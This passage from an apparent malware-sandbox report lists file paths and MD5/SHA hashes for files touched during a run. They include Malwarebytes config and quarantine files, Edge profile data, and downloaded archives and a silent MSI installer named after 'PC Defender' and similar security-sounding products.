| SHA512 | 4fc2a1ac3468c208f3dc9f0791f97ee7da3edf9f6af2c8c4ee96e5a53d7c916c197d5506d8640c377b9b849ac8e772faf2975c60547b264b798ccfa4f6dcdea1 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | a9f74938eb35ee881d08a00283e2181f |
| SHA1 | 02ea9f4b700c0d9bb6b0eee9c2deec33e52face0 |
| SHA256 | 45670477cb9a8dda3a32187aef5f52c4decdc35c7fecff903176f4e4e1e349c7 |
| SHA512 | cb1756b66ab0b8279f6e6ab07137bab5ece444d853524c3aae32bab02325b916c347a33b9239b7a00cf9846a8b4d60a4807c3339a58daf84d3fcac91c226a0bf |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | f00ebe0c372d537632ec5a5a4f69bffd |
| SHA1 | 99f2fc4db45123b2713ac30e87b050dd5b5c66b1 |
| SHA256 | ab69b9fe23cce16aa558eedefb1f751455d67a8422a80560a23f49fd1e1752da |
| SHA512 | f550526b9e78581ce434bae1637789a51694bb1ab74cec2c0d41d38e2f46bb3d24c9d63d23f9ed15b63d9e0a54b4c6f3b1fc8fdd3199cf9fa2ce67b2d85f30dd |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 5d045cb388dcf6d614b28790c523a255 |
| SHA1 | c71c9388741d3c1dbf7785bb47ad8630586cf99e |
| SHA256 | c80d314be29c7b22c01f7c2a7d2e806f19e731b1fecddf895e8272f2fdf6947a |
| SHA512 | 6093267683b11524f74503040380ddb2aa3eb3ae022ad7db1114c1e18de16f4041016d721cc4aabe69601c59d2317f86f78d79d21ee281e8a68be171b6bea9cf |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 2a89c401869d45b8d49a9730e0cd75b9 |
| SHA1 | b0db4d014a7dffbad1bb5993720d5044a86307eb |
| SHA256 | 7565e5a6659bc21d88b89087e896e18364eea716500ae038adad4ab932ab9fa3 |
| SHA512 | eff541bf848b9a40a2575c032642768b6f9e13329ffc4297b0fc83cb58852d3f3dd935b52bc79998b83c34a41816fa67403188d1c38853c93eddc5097348514c |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 1896b92f444e18063939079a71a0339e |
| SHA1 | 940a9a795d7bcd430b0fce47cd381d0fb617098e |
| SHA256 | 80b7a8baa6922540a0dad3731a701829a1a183a1198b609571386212e05e79f9 |
| SHA512 | b63fe565c015a5f0a2fcd480ef506559429058e3d1f55ba40419e0b49c826a9328cd4f72f656950dd91bc2196c1e7bef0dc35183f312e3c80bf72197241e2ff0 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 2d24875c346c85b0c42c469412f193b4 |
| SHA1 | 445b0bf14de9c86f378b3ebfc9539d22d61889e6 |
| SHA256 | d44829f3a6b397dc2b8319306a97daca854f55db4f80ac4199276a6ab8ccf63b |
| SHA512 | 7a40c128bc07808592f4704129c7ef195dbe0ab6f8bf0681c59d38b1c73713123e7af4205378a117a57b5136830c30fabe1d358c1723af160c8a933b614011c9 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 082ab8e47653b1d2e30f59e3d4dd0ccf |
| SHA1 | bb441cde07f6d766c3b62bb884d367cd6bd4ea48 |
| SHA256 | 14bfc9491e45e101587e44d6d3c493f1c8f78c453f812eed7732b26dcfbddb5b |
| SHA512 | 217747eb4bf356c6d398b66936b06bff24a6f711c57e42fcbb0ff63c446a7ee64899709b9ad1544a70f82bb05fd2fb8a5ea594e536c87ffb85bd9d38c4ae31eb |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 0175fc4fd02c229c27db5d9b70a845cd |
| SHA1 | e77943ef45d032e3e171d640e965be600a1472d6 |
| SHA256 | c11935f9f34f07f9eb818f158ac91d6af7d6d22de2d7dd19709189e0e04b2561 |
| SHA512 | 0312b00636138e168ba14af52f1216b46be0c8a0e405101862102e8071eaf2624b7b69b7425c2cd466cc18bfbfdb9bac88e78d41ea90c7a4f0038ef26759ff10 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | f07972221729764a81d1280c203ed19f |
| SHA1 | 9e21c223550fe72aae92c16a59a9128af63990ff |
| SHA256 | 6cffb4166bb60129d38de4ede9ae63a70062cdf74c93ab666993bb7847d6842b |
| SHA512 | b7c7ba90001364d1473b776dadb2505ef82970d9d7b7babf25fc9e1943f2ff08820ecac3b33568639f0c97a4a3cc0e68153edd4b437782328b2397e0ae533ef6 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 0d4426398fd9192f80dee69d7fe404f8 |
| SHA1 | 676ff2a6f009c47b36a580bea7c9161b17965120 |
| SHA256 | fc9cf7686484e407901a35c34bdee05e1b3aed0dc31d2ce6253bfc608c0c08d5 |
| SHA512 | a685fe6ac33b88091135d87f39c8e0fba4d274fc0e0eb02ef1f8b8a56c35f1bb3f168a63d061c7aaaa4e7547f3f07e53c292bb4d73ea8026a686a04945793849 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | fce560b99c66b6e5228b82c133477d60 |
| SHA1 | 439d9924ffb1aa7a84c98ca677215ac36657284d |
| SHA256 | 248c5d81eeac486b554db16666e2ef30963c7e2af209deb638d34850f2f81838 |
| SHA512 | 681165e9df2ff55774a8c43408b8677171e3822b89b27caf5b62b898fb88f7bf44c3161d9f16e46db6ba81e61befcea5efd057b3bc0f36ff1905ef7e3cff89ed |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | dab6d1bacd066b16dde1f495a8540f09 |
| SHA1 | fe53453b99acbb07a911bb9aff40e60c834d87c5 |
| SHA256 | 57bd212894ca412b227abeb2c16544003cfeab997d3bff468c1e4c3358c236a2 |
| SHA512 | 5e141e35dcea63a6e226831348355c0455f540169f9dc196a3101816ca573ce391b9bc1cfdb5e0a3f894687c6350c7010f16087cfac83c29fb84cc8537adac81 |
C:\ProgramData\Malwarebytes\MBAMService\tmp\d926bd78ea3511eea15762d9003ae027
| MD5 | c2781e281043750bbbef41949ec39742 |
| SHA1 | 2cec74962f41e06a9059710d6a70aa80b792b2fb |
| SHA256 | 5ca9ed4f0ff3fe2fea7721e2a016ee8ee8dc182e4fa20a6f7db51c1d6ba88788 |
| SHA512 | 9a40873299a9f4a158c1166b2dad9283c68bdcdd429d0b9a2e9caf32b9bb76c616828b30efb52984e21b8dd5729851c17d7b9ec6c31e1de9108e8c9f90d67a50 |
C:\ProgramData\Malwarebytes\MBAMService\tmp\d8cc8fecea3511ee99d262d9003ae027
| MD5 | 231e190eafe2d0a704331a4ae10df9b3 |
| SHA1 | 108c55738e19ad87c99fde5c2a720d2acc9864cf |
| SHA256 | f8041602c8038d132ee294396ceac024b39aaa94c50011d347d250d2ecade15a |
| SHA512 | ed1d9102eaf4735467d72e6db3449a9bb098577194e969ac888c05e144411aadfa652034b1ceab3bff1bbf10c71e50b5a415b7042da1456a4a62d7dde199ff05 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | c473440f6708d9c74385691b1462b6c2 |
| SHA1 | bb5487b8b46e15a2b587e92002249a700cf2a1ee |
| SHA256 | 76aafb4bc06bacc4ff304143490957852a8634ea648d14b21ff897751ef3a4e7 |
| SHA512 | 5d0b2adbf711ad87ca9dc0d163d60102a4343d1012131ae169411f75d5d3a90ce39d1a39475cf453a5caa77f80a2476b0d97aea3b2d9a9c54dd65ab24909f29e |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 9edb8db118e8109f2dc37522c245620a |
| SHA1 | 7828b3d0a0e43f822a3d102beb58ac9942acbf5f |
| SHA256 | 128090d0635b0a40acbb11c223e343724c91939dedac9aaba1af526b510996df |
| SHA512 | f66aa4d2dceef6ea0919f1e1d9b091d4df369051a3d4e46528fff680beec4afa1facb5e7ed462aa0197f38b2efb3f3f4381909f0962290f0cd1ed23c2b41844e |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 3b8ae0b142822f751776196d1455be03 |
| SHA1 | 91629e39c9d8fa6bc1701281f3ff8b8a5197f04a |
| SHA256 | 9eb8a436552d46c2cf482336e18c257ddb5f6cd738b4a71bd0aa962597175eeb |
| SHA512 | 30f4228078f120f34ebbda44a283560d4d92bf32e7fd8a05e271db637ce6e4b68b7c7e99bc988c662049d10884b2f7d377c6f0791a1f2ed30aad8b9cc0917291 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 67bb9bff5ae6fe8e815af382f8b59c45 |
| SHA1 | e1e0bd20c2d058949cc9f71be63931888ba448ee |
| SHA256 | 2d5a4a61f99d2d29209b13a70d475663527064eb88b3c5ae5eb10cdc1568c65a |
| SHA512 | 3e016f83f8edd396328e2f32e467c1b0fad886c884bb8430c9e4ffe06e26dd84a3ffd7ece29d21866a880ece7f69fbf3fdd000b98c9775974b8d690a1643ff45 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 31e2cc9f519526f90e8072835f8dcc45 |
| SHA1 | b70d036f7fc001cdbd4bbe837156e549a8527e55 |
| SHA256 | 43a53c006f43a8e75935768e3fa9bc5d2b5f569ba34d43fef8886148a831f2f2 |
| SHA512 | aa37aef2df046d6b1bf8cbf3751e952a476ed891c215ec48382395c5a2f27fe1d384180c401056a6e2895bdb534386a2f63b9874120c4fc5c77917a4f25e5f14 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | f1796ce040afe804879f4fa19e9f9dbe |
| SHA1 | cb19025bca14e4c414fcdfcd3cfd1514f8cb2fba |
| SHA256 | 4cc07e6ed508861fb97eb1a10480d9ff9b9f59d980c461aafde5eab57339c0f9 |
| SHA512 | 54d8b4ab0236fb4f7fac48e3a651e1cadbb209ca58f877000327e43aad1398ecf85e9e73555a5cb82fb11d8785577f8bedf8411df915eef567a33724a1fbd3ef |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 71f12ff772193303e8e21935f1cd3347 |
| SHA1 | e96ed3c4d20cde637740b9ef2c7c7ea102c9b41c |
| SHA256 | aa84ee4b3e81aa96601e1a0fb89c3855d2a033c5d35baddfe5f8392b72282a9c |
| SHA512 | 8c1a7f06ac0ebc94f373153e6badb706bc3d2a0b4b1aeabb46a096a612f9645d0bd59682771f4b0a4c47a220c627071aabc9e86d7cec8c3640b4264dc45b5c4c |
C:\Windows\Temp\tmp1708aaaaaa
| MD5 | 08d7d945b1d6f4408c9144a0426f824c |
| SHA1 | cf68fd84d6f929c09e3bcc6b2245b485c92f2803 |
| SHA256 | 7b714c25c59bc88eceb779118065d6f3f946535ca350d0907f2f46c99ac2319b |
| SHA512 | 6cfa9df8b2b97b8242b189e2ad421c08d94f830e054248f69bc2159b850b9e6c0e261671952424f7a64566daa93806fa1b09b85112d9a7e798f66aacc3aace5d |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | b37bc252c4b03636d6acc484c12bea38 |
| SHA1 | 73e439d270cd14436ef75eac6a6a33a589856812 |
| SHA256 | 6c2ec99fd972e195b9fa710757509fa1362e3d71b148275be00f8da0513fed97 |
| SHA512 | e7de431cd1646203667c3f0a8faa1ca24b1155b16a832592f52e84a5528078dda9e458feac2ad44c4968f2523f032d1e46266a0a41edc6f89f0c3be2eb633b02 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 1ccc788c3b22723d7512f8cc1b8cf040 |
| SHA1 | 9fea60c5ce32252d16676021e9b596902166264f |
| SHA256 | d6c5fa2698fb85e92ca1d1804669b5436b40d6a34a48339bbcbb9cecdab8072d |
| SHA512 | 125e607ca3ef9d097e303aa95e696f90a463b36c7c6ec2d503f6dda2c877dcf5d7867bd8eb58fe49f21f0a29ed6f64f7f0145de08a87983cba69fdd90ce2b61d |
C:\ProgramData\Malwarebytes\MBAMService\tmp\dc9e09f2ea3511ee8ac562d9003ae027
| MD5 | 246df647be939e4aab19b5892ed87b47 |
| SHA1 | 88ceb7f8dbf280abd10b9333b99b5e2489da67f8 |
| SHA256 | 5d75952b0457d9691f093aa6524aa1cfa96584be3ec95afdfecf5a0471fb91d3 |
| SHA512 | 2c3be2aec83abacbe5f2b93d2278bcdac961d72764076c7164edccf13859338e2dc40ace4ae3511208bbdcedfa60539ae4c6b2b00fc92a5e9eeee8ab17b05ad8 |
C:\ProgramData\Malwarebytes\MBAMService\tmp\dc591d24ea3511eeaf7862d9003ae027
| MD5 | 57f92586bec1156d85308893d28c8d3a |
| SHA1 | 9cbd97c234c71833e462fc2f870419c2533bb2ee |
| SHA256 | 304b6c51ff4daf1ba42cf7b46b033f8aade7c45d68d0ffc87a60514f92b3a9f0 |
| SHA512 | bf6d91957cf8ecc8268f5f62a859c400e412ca1484bd5e72cf409c4840cefec6cec2fbe04c557e1dd18546f15c8151c73f390239c0d624ebf0f9d1393e156767 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 2d7ca36c7e9e9777ee6f667b65a8e179 |
| SHA1 | 324f6f5648f752bf5119f2de18767e192ae79f27 |
| SHA256 | fcd7cc5d69bbd24346a9b46722ae39bdff13c0032f87c42b6c9d2a3053bbc18f |
| SHA512 | 412b8abc2f5b06cf892823fb74150fa136120d213715d51fba5c968bbbfbd58224769b4a21e528739a9df3acf78a19deec85eba1afea81793205025dbc9254da |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 4c323456c449fffba7c7674363e1addf |
| SHA1 | 837ab93b72644834fe0307b47c0c6a96f6bb345b |
| SHA256 | 2b72ee5de9387307347f2857fffca73b73c0068b50819a313dc188549cdfa876 |
| SHA512 | ba9bcfd790078488545e5a216731a01ceb75bac6de16b5465aba8234776836d3887a9ec3f01c90b6a7b75634d4bda0c67d37af652fc6d5a8087d8e76c4a3f55e |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | a95233c43dedd6528ee65ebb98bfda27 |
| SHA1 | ee9764b0961ae95c4d4ca6490e5b112bdcae8e23 |
| SHA256 | 7038842a9f6bc303dbbf727f4cc3d7e13e3c47859f2880cce2f4f0683bdc192d |
| SHA512 | ef9768282d084ae7542a843debe0518e106a841e3881722d20c3bc1ad46966b0158b392113884fff56cc5c47293e79a370dc8536d4fc60d7cc1657a1c519a55d |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | df2b1c69d0d607ddd0c3ba5614325717 |
| SHA1 | 6bfcdc9cb5b7d63ab66b2f3c0dc37dd7e0b4105e |
| SHA256 | 912c6d1d5e480612455ffd328049868355770d969055ff59380d1955a7fd0b9a |
| SHA512 | 8be69547452440bd0ba98cdc66519f097ab4699a405894cae37bb7a87002cdee23c2a15880679796a64107fad481a506cb06c1c7165ae251fc24e8e8aa1de24b |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 0b256873477a71eb167c0ce917b5b4a2 |
| SHA1 | 6b3ebe000396999994fea838529cd329d5706ff0 |
| SHA256 | 21ea03b9da6549d120bc84f6abfb362f054fced08d24fcf09a6423075f16431f |
| SHA512 | fa7e73c0a6de7d91625391df13c8c6e8368953939bfcdbf045d763324a3040a8f034a28bd240037903ee9eea6bb4cf6c7d9a599086099c282a1064e0c66d9193 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | aec4eba3e54a73c302720b0cfdee024c |
| SHA1 | 8a6cf7beeaf30012a0b246ab0805c9a8613c896f |
| SHA256 | 23a7530d801f4528f49156f16e778a95dc5d908140d478f7b607c3786028dcd0 |
| SHA512 | 05130bf0ef6e606b9988a508cddcb88832d10d4193db6f143e5add5abe44db7889d55e55c6ff195069d517faa0bcef085177ff565825c792a5b207a99b4ab671 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | a5cd035dbc54c94d52383375a7ebf93e |
| SHA1 | 9eb763dfcd81bc1f8f60e6c050e9eaff2a17e9bd |
| SHA256 | 3e18c6785d7ad6999742718b8a69b0bef3c6281514f2e481dd28bfc17bad19e0 |
| SHA512 | 255e09b16328c73f44c6314a8c1f6ad4e6e8fc70d341c5a685731f9ea1307002b3a2eb7f289166b417baf12e6301ba3768bd26dbd257a80a04c05768dc59ac07 |
C:\ProgramData\Malwarebytes\MBAMService\ScanResults\b8d8525c-ea35-11ee-b51c-62d9003ae027.json
| MD5 | da98e4cc5769e77671cc7639849c5336 |
| SHA1 | a1b0e99c026b913467194b914f9ea73198aab902 |
| SHA256 | a04c8b10e7b895955f1886adb03e01bd9aaa5f9eab05a776c3d2d3399f051db7 |
| SHA512 | d151fb04c27c9a39a07be92be4a396a660e9881ca5fd5a8b5be4e1dcbbf4ec1ac39c049795aba9ff360229c4f81baba58139253cf508a3442333c68386d24b42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c6fe3b255d7947081087def69cff4294 |
| SHA1 | 3ffd47ede73c9527e1410ed74a8657783477ab43 |
| SHA256 | bb0d83af5210907f9ca0f43241c8d73ac9d5319b692e301cdc37a39b78630a3c |
| SHA512 | 1c073523a20bf983957b3a5d7b9442394e165004c3e83e75e8cd5697eb636d65a722e768e49a2449b40f9c2b5932f3ae4ff4c73f20fba1f65fd2df355465df7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5403b93f10c2e9bcfc48129f17498399 |
| SHA1 | ef3800bff4c81450ab07130652ff383ac8c62676 |
| SHA256 | 5e51ec270f90fa31fd305112fa594adb13765f96bef3bece4e068572415ed8de |
| SHA512 | 9c586a3f4302b6bce0f91f063cc81fbe24fe10f1b6a43b9ac75c8ed7ca51f791790d3dd05ee996d5bd41a7703150b16c7736bd8b7c6fa6ab3a298cdfafda334e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 60e3f691077715586b918375dd23c6b0 |
| SHA1 | 476d3eab15649c40c6aebfb6ac2366db50283d1b |
| SHA256 | e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee |
| SHA512 | d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd5340aebe0e9e39f6460bf784f6e139 |
| SHA1 | 56ba086f42e38b6240bbc64ceb6e6ddea79ed513 |
| SHA256 | d0a4f8786e101a2dd3882f1096730fc1280badaadc86c558568906c29401f6a9 |
| SHA512 | 2041753066a8f5e056dd15a1d90f71ad065a7eb5678a7451d6f069dddcaeb7624e4de2ddb4f73a2e9ff4de7b649b2ed38344dea7e9c664666bf9344849f5ba55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e45227f1fbfd20cbd12b0c43be090b6a |
| SHA1 | c3b09f9a126e765b6d2109c0c1443e3bf89aeef6 |
| SHA256 | 24baa6454be974c4ae993e6fb0d73c9757c27b9b5bf58fc2b272c72ff46ca05c |
| SHA512 | 0b582fbfbbcc343bd5e9fc419fd2df9388b09b4f4d6a0a4cfbf06349a702597c22416bd3c3a8f7bfe13c13295d8824719305ef90e6005ccfdea5cdb610713a48 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f692307387a678d0e924b806c6bd8366 |
| SHA1 | 8cd60effab42efe62d4c5b372d5201b68070b956 |
| SHA256 | c086180302361b72244b8f8b16b77433e7d32c26140ffb2152ebe1a9518d1d62 |
| SHA512 | 2f4e44191ee406f131f5f974289c508ca5a13d8ddac90ce14dd38d6cef1d66928a814533d27206a770a0af5873e0cef0acb8f29ba922ddea98f33281ee05abaf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 42e138ae6cd41ed58226a7fde3e439d8 |
| SHA1 | 0acc84037284150ef5d298cf038b86632f54f7e8 |
| SHA256 | 5586251060a5389368a0af233e74724f55dbd724545f0da16a1e8f2ee66eb774 |
| SHA512 | 4f1c24b09c31b8216266a55e38c6c8847d693899976ddabaee73c695bce6979330a65a8255c95f8e03ebba5dbda332c4ded70d583a285f0520a98e37153a42db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 838065593a3b3cf9d057d20ba9eb6531 |
| SHA1 | 88b30c75096e08543278b0c542324cc1dfb1202a |
| SHA256 | 3cf2bb303578e82699674a14425856288db3aec3055e13e06c5f35def2b2f778 |
| SHA512 | 864e0540572c41fd7dc684d833c204cb56e036118bd8ae6cc727a141b891c5a21d14c9d74100d8f76b6486502369a9f5e2eb615b37ecb8d7cf9dd4acebec51de |
C:\Users\Admin\Downloads\PC Defender v2.zip
| MD5 | cad618323b07c0f4f6273ae08df1779e |
| SHA1 | e67715f81f83ce7cda32f12a116cc950b6fd0dac |
| SHA256 | 854113f2737ee276ba34fac399e8a615e4de4c712dd7a761ab0e198fa09d87fc |
| SHA512 | efd9403706accfe996b5df58300b5e0a0b461727bdf7c5492e9914369fef09ae06cdc2d00d30ac6d494fc68dadcf423d800741f7c22d5c1d565ef3fc675c4565 |
C:\Users\Admin\Downloads\PC Defender.zip
| MD5 | c2c0e8a4b2790140ea1aae223669c48f |
| SHA1 | 664a18b5db524fad9e43df2b9c3c0577562082a7 |
| SHA256 | b23eccb36868753a1131a9a6b88b33324b3cdd7e232fb80cb5df4e2994f5a9e6 |
| SHA512 | df22757f866564887154c54a053f919f03a27ced1446b95979b02b8960ec499167f6e9c3a1f76e8359ad044c8a5ed2c6addc4874a712f75726a24d3029a8587e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0d2e59de4ab523a39b9821f5ce611984 |
| SHA1 | eaa93a24531dc9ebe4f8964532f78479770d0e1a |
| SHA256 | 91fa771e6908395b1234d11b9c3ee7755e5e1e4f1c04fe1b5e26ff81871bc229 |
| SHA512 | 6d0ad13bc7fb0157e276b7b8aa76ab4ee28067c23cbb3d7180e85360cb3fbc000975e5f744886e1085a4d3d0a12fe74f185183ffc99ae84e9d7da500f81fee0e |
C:\Users\Admin\Downloads\Security Central.zip
| MD5 | 32e630865a498a6fe5bf4d8dd593dccd |
| SHA1 | 05217c896a53c77c7f751de72875a7315232c293 |
| SHA256 | 62243c2840d5fbeef1cce73dbe4929727afe174968b91faba3848b89ab550d7f |
| SHA512 | baa4ba5e61406848bcd2683fbd8d480c0ab22954af9b9933284dfc4fb2e9361fe0244efae3ce9d171b5510b8030bb510fe788d8ae3fe476b29fc8cea815ac244 |
C:\Users\Admin\Downloads\Security Defender 2015.zip
| MD5 | 1e23b530fefbf0e4c6696ce8a0874081 |
| SHA1 | 585ae1e314118bd4cbf15d2a66a6b708d2e46735 |
| SHA256 | 5daf5731d28583a37a7d574d1d32ca89e2ed2dcc448cf0ebcdc6d43bc4981a92 |
| SHA512 | 2312469eb3fb93f311bf28c14d2f5ad39e3ddd3ad4aa19306f8b276d4f401972fdc5e7659f388c08dacd739a8162b05d06e052f4342edf1c1dd9aecdc32560f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0c9364361ca147b889506cf0b95e3a6d |
| SHA1 | e085a378b0d7aea97c6b8f64b5fe32bae64054cb |
| SHA256 | 17dfee8feeb610b022b23738067354ee951818fa757f7aca5570064acd7db5b0 |
| SHA512 | 04d1eeaa1c9079faadda64a5ba89688bab22f705822bda0c5ab657ac1a31806860790cbb4c17fa8706b10cde3aeedb2a0bd206a862799d85b770c542eb22e64d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e4f85892216001cd5d3938a660b51f19 |
| SHA1 | aba1bf437eeea369fc4158a1d4ea5d86a054f9c8 |
| SHA256 | 95179612d137221ca2ddcab8a0fa15c64131942525534e1c150b2f002df844e0 |
| SHA512 | 1e8cb4271e5876b628e6d4c954e8cbc6b0c050818434c548bd4126bbc5c801582b01baa6086f3aa5c94f0ce2df07bb6bcd1e4d336b884e445923eaa5be3e6e9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 352fc50563a1d13d6fd01d2e92467bea |
| SHA1 | 610553fe6583b4b4e486e4b134d579debc9d908c |
| SHA256 | cdc3a4b4fb3026a41a00ebbf8e810c861f228052d943210a808b079e8a53b48c |
| SHA512 | 7f40ad56b2d79dc1f5b1b1448671be3fb4e459faa28a047dbaa2abb5c87a9cb8db479a36cde7cfda605774dc586323d24cce9c7f65a1a738cab752dd35a022d5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | c7f8281a2abb124ed57b0e28703b338c |
| SHA1 | 1a8d2f3b4bbe7c67695b9601b206647dcf9a3d9e |
| SHA256 | 89deaf124562c77d98a818b76750940b98fe54e9afdba07b14f34f916c21520d |
| SHA512 | e50146b14fb1e63051f46ab73a7a02b7c723edc6d487fd08b7871e6dc3b2b2b590508fd86dc0e3f4c758a46e4eab60f033c36a0bd6111580ac16c029b347d04e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi
| MD5 | 7f728acab22868ca02cc1ba0a14f5d64 |
| SHA1 | 9e3e82b152447b8bcd27583fbdab7aa91ca4739d |
| SHA256 | 586f9a9af50b2a3321e77d2b4583741cc4842967af9429cc371534f7179caec4 |
| SHA512 | 9bc8bb97e6d4f18ec484fcd792466cb5df0bf0447cbaa19a41258ef80e599e8a2b2c83c700f32f30bef578b03614af1b554844d051435dc9f510ccbd56686800 |
C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe
| MD5 | b84df77564555c63c899fce0fcec7edb |
| SHA1 | e63e7560b3c583616102cad58b06433b1a9903b0 |
| SHA256 | 912ebab4ab2ea830b961df778dd854e555c89e05e25b7c02b3737429115405f9 |
| SHA512 | 857717981c44a6a5fbb1bd34308e981c448746e0ea2d5bea94516fea20d0186e00a3547ad0b948c10fd9493e3ca00c0899927b0fa51c240697faacbbecca033a |
C:\Config.Msi\e71c4eb.rbs
| MD5 | 00cf43854caec1f15421d08bd050947a |
| SHA1 | dfc472f313a45466aa618a25594f9ac075f47c99 |
| SHA256 | 433b5f9d3f12c104050c3db7b59a50c00857169fda8576362900682b1e6e8002 |
| SHA512 | 4f8a48d2f494ba8a0e0edc1fdc3c409e540ac9b851da720c3622a28b8e9922884ac8b79e7d8961edcc04df0b8435893610db5001c9d8b67548531eda1696b698 |
C:\Users\Admin\AppData\Local\Temp\{8182D845-543E-4FDA-937C-B361CEC2A0BB}.png
| MD5 | 099ba37f81c044f6b2609537fdb7d872 |
| SHA1 | 470ef859afbce52c017874d77c1695b7b0f9cb87 |
| SHA256 | 8c98c856e4d43f705ff9a5c9a55f92e1885765654912b4c75385c3ea2fdef4a7 |
| SHA512 | 837e1ad7fe4f5cbc0a87f3703ba211c18f32b20df93b23f681cbd0390d8077adba64cf6454a1bb28df1f7df4cb2cdc021d826b6ef8db890e40f21d618d5eb07a |
C:\Users\Public\Desktop\Malwarebytes.lnk
| MD5 | f135a8b5896722f856c9363b71c1cae3 |
| SHA1 | d67101d8081b613b6f5566cceffdc0fc7a2746aa |
| SHA256 | 256abe3969355bf070284c4f2ed502d1acd1fb8fcdd9fff50a102a22ad733eda |
| SHA512 | c7692be58e80152fe0f5e9a93f98115c7cd7f37480c84b10a242971e5ad5fb9bbc1be5f74a46f331d9ea8be2eef91944c80691799c5240e839d2d8fb80e5fe1b |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\7697ae48-ea34-11ee-9af7-62d9003ae027.data
| MD5 | d46dd8bfb6ffcf08c6c8d68719cc0ea2 |
| SHA1 | c96cb01bf6e6c7fbe13a0a59e272c7c8f08622f4 |
| SHA256 | 717154c949f7e947d85b1ae3f938b71a27a38cc2eb9fedea67a27676b8eb4a0b |
| SHA512 | 9ed59cd8a9bd4719b378df5671b10b85d5659b723c6e4bd48259900624e0298224a5af056099db55d340547ec486e6d60758479c4472fce204a1e40e413f7595 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\77f0876a-ea34-11ee-a50f-62d9003ae027.data
| MD5 | c19a192ae4d2b50b092b4ddb5da97bdb |
| SHA1 | 46d3f5e0a20312d24366664696ef9b29b8aee28d |
| SHA256 | d4ca8a68a8ad1de0ced8fd7bb1c83fc3e81b68d510aa6ccbf8a7d6e760a234da |
| SHA512 | 7751ff6a13707142b7e1f0637407fa18078cfde2d62a86740ca68d87f8e826b667ed5d020ead905ce9f82ee05b5e3247cc2b545cf1bc15e36e20e17f83d4740a |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9d9fbf31-ea34-11ee-9958-62d9003ae027.data
| MD5 | 8988ced305097087dbe22080f0444383 |
| SHA1 | 396ea0ec8a452ae7056449f229d9c8dfe81baa72 |
| SHA256 | b371ec64c72acc889f4656cfebc1d8c4d10d02b6eb4218a32925fe4c44a0fb24 |
| SHA512 | 9a42b33400489b984392dc38d026f05bc4ce778fa03e946a56016e7d762d6758bfbe802ba7ef966e28623629ea4289db9231c0f1491f0fff336915b8bcdcc4b3 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9e4a56a2-ea34-11ee-a052-62d9003ae027.data
| MD5 | 22fa00f02eed03193057f677df1f47cc |
